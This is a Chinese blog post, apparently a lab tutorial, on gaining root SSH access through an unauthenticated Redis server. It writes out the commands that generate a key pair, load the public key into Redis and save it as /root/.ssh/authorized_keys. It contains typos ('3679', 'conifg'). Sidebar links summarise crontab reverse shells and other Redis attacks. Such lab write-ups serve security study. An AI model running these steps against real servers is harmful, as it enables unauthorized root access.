redis未授权写入ssh公钥登录

最新推荐文章于 2024-05-03 23:07:14 发布
最新推荐文章于 2024-05-03 23:07:14 发布
阅读量3.7k 收藏 8
点赞数 1
文章标签: 服务器 redis 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46576302/article/details/126766457
版权

原理

利用redis的备份功能,写入ssh公钥

利用条件

1.开放3679端口和22端口

2.服务器用root权限启动redis服务(能够切换目录)

影响版本

小于redis-4.0.10

实验步骤

1.在目标机上使用root权限启动redis服务

1.在攻击机上创建ssh密钥对

ssh-keygen

 

2.创建1.txt,把攻击机的公钥写入1.txt,并传入目标redis服务的缓存

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > 1.txt cat 1.txt | redis-cli -h 192.168.117.10

3.修改redis的配置

config set dir /root/.ssh conifg set dbfilename authorized_keys save quit

4.ssh免密登录

JY九号
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3125
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器授权访问Redis以及读取Redis数据。
SSRF+Redis写入公钥
qq_43665434的博客
04-03 3307
野径云俱黑,江船火独明。 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库(授权访问) window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis授权访问写入公钥登录centos8 实验准备 思路: 先在自己的主机上生成公私钥对,利用redis的数据备份功能,将自己的公钥写入到目标服务器的/etc/authorized_keys中,然后使用ssh的私钥直接登录目标服务器。 条件: 1、redis服务使用root
Xshell工具利用Redis 6379写入SSH公钥漏洞
最新发布
maple_leaf
05-03 375
本文介绍了如何利用Xshell工具利用Redis 6379端口的漏洞,向目标主机注入SSH公钥
Redis授权访问利用
LiuSiXian的博客
07-14 694
Redis服务器:192.168.100.10攻击机:192.168.15.101。
利用网站拿到服务器登录权限,利用Redis写入SSH公钥获取服务器登陆权限
weixin_36156325的博客
08-02 2636
前置条件:1、操作机已安装redis客户端:redis-cli2、已使用ssh-keygen生成用于测试的ssh公钥|私钥(ssh-keygen -t rsa -C "test")操作步骤:1、将之前生成的公钥写入文件中cd~/.ssh/(echo-e"\n\n";catid_rsa.pub;echo-e"\n\n")>hack.txt2、将hack.txt写入靶机Redi...
redis攻防-ssh登录、主从复制、授权访问、计划任务、webshell
weixin_46626737的博客
06-30 646
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
python脚本实现Redis授权批量提权
09-09
本文将深入探讨如何利用 Python 脚本来针对授权Redis 实例进行批量提权。 首先,了解 Redis 的安全隐患至关重要。如果 Redis 配置不当,允许从任意 IP 访问且启用身份验证,攻击者可以轻易地连接到 Redis ...
WAF,Yakit,SSH 小技巧
来日可期的博客
10-18 577
WAF,Yakit,SSH小技巧
Redis数据库授权私钥
weixin_61425169的博客
02-20 731
Redis是一个key-value存储系统,拥有很强大的功能,redis是用ANSI C语言编、支持网络、可基于内存和可持久化的日志型键值对数据库,并提供多种语言的API。reids默认端口是6379。
某医院的实战渗透测试(组合拳)
热门推荐
LiBai'S BLOG
01-09 1万+
项目是内网环境下进行,所以通过vpn接入内网之后进行目标系统的测试。(信息泄露+redis公钥
【网络安全】通过Redis2.x实现ssh授权访问
kinghzking的专栏
08-23 2379
下载redis-server(目标机器,kali):https://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?下载redis-cli(攻击机器,win11):https://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?redis刚好能满足我们的需求,2.x版本的redis,默认配置,能被外网访问,并完成上面的操作,我们正是利用这个特性,完成。攻击机(win11)上连接目标机(kali)目标机器的redis-server安装和配置。
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5433
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
利用redis漏洞实现ssh免密登陆
OfficerGoodbody的博客
09-01 852
环境 靶机:ip:172.16.7.111ssh:22,如果不是22需要用nmap扫一下redis使用root启动,yum安装的redis默认启动用户是redis,如果做实验的话需要修改/usr/lib/systemd/system/redis.service中的配置redis设置密码,如果有密码需要先进行暴破 攻击机:ip:172.16.6.110安装了red...
redis授权访问漏洞
weixin_43995159的博客
11-29 1216
复现了三种redis授权登录的场景。 1.通过redis写入计划任务,取得反弹shell。 2.通过redis写入一句话木马,取得shell。 3.通过redis写入ssh公钥,实现ssh无密码连接。
Redis-密钥登录ssh,免密码
weixin_54227009的博客
06-06 1861
1、在kali上生成密钥命令:ssh-keygen -t rsa因为我这里有了,所以y选择了覆盖如果是想无密码登录的话,则直接enter跳过2、 因为我这里config set dir /root/.sshdir有问题,所以我直接就把生成的密钥放目标靶机的/root/.ssh/authorized_key文件下了原操作应该是:(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n")>key.txt防止乱码,将公钥写入key.txt中将key.txt导入进目标机器cat
浅谈Linux下的redis攻击
qq_64201116的博客
10-17 5234
redis服务ip:192.168.65.163 (CentOs)redis服务ip:192.168.65.158 (Ubuntu)kali攻击机:192.168.65.158。
以下哪些方式可以结合或利用redis服务进行攻击? 在redis写入ssh公钥,获取操作系统权限 在crontab里写入定时任务,反弹shell 组合SSRF漏洞攻击redis服务 redis主从复制RCE
06-09
以下方式可以结合或利用 Redis 服务进行攻击: 1. 在 Redis写入 SSH 公钥,获取操作系统权限:攻击者可以通过 Redis 服务将 SSH 公钥写入目标服务器中,然后利用该公钥获取操作系统权限。 2. 在 crontab 里写入定时任务,反弹 Shell:攻击者可以通过 Redis 服务将定时任务写入 crontab 中,并设置反弹 Shell 的命令,然后等待任务执行,获取 Shell 权限。 3. 组合 SSRF 漏洞攻击 Redis 服务:攻击者可以结合 SSRF 漏洞利用 Redis 服务,例如通过 SSRF 漏洞发起 Redis 内部网络请求,然后获取 Redis 中的数据或执行一些操作,例如写入 SSH 公钥,获取操作系统权限等。 4. Redis 主从复制 RCE:攻击者可以通过 Redis 主从复制漏洞,将恶意的 Redis 命令复制到主服务器上,然后在从服务器上执行,从而获取 Shell 权限或进行其他的攻击操作。 因此,需要注意加强 Redis 服务的安全防护,例如限制 Redis 服务的网络访问、配置 Redis 密码、限制 Redis 命令使用等,以减少被攻击的风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值